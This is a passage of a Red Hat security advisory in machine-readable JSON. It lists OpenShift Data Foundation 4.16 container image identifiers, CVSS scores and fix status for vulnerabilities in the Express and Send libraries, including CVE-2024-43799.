"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
